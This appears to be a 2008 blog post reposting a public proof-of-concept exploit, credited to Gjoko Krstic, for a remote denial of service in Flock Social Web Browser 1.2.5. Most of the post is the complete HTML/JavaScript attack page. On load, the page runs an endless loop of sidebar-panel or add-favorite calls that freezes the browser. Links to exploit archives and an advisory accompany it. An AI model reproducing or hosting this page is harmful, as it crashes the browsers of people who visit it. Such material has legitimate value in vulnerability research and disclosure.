06 September, 2008

Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit



http://www.milw0rm.com/exploits/6391

http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html

http://www.securityfocus.com/bid/31044/

Test: http://www.zeroscience.org/codes/flock_dos.html

PoC follows:
-------------------------------------------------

<!----------------------------------------------0
||
| Flock Web Browser 1.2.5 Remote DoS Exploit|
| |
| by Gjoko 'LiquidWorm' Krstic|
| |
| http://www.zeroscience.org|
| |
| liquidworm [t00t] gmail.com|
| |
| 06.09.2008|
| |
0----------------------------------------------->


<html>

<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>

<head>

<br /><br />

<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>

<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd><h2></center>

<body>

<script type="text/javaScript">


function Xploit()
{
title="DoS";
url="http://www.destr0y.net";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}

else if( window.external )
{
window.external.AddFavorite( url, title);
}

else if(window.opera && window.print)
{
return (true);
}
}

for (n=0; n<n+1; n++)

Xploit();


</script>

<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>

</body> </head> </html>

<!-- thanks to Gianni Amato -->

------------------------------------------

No comments: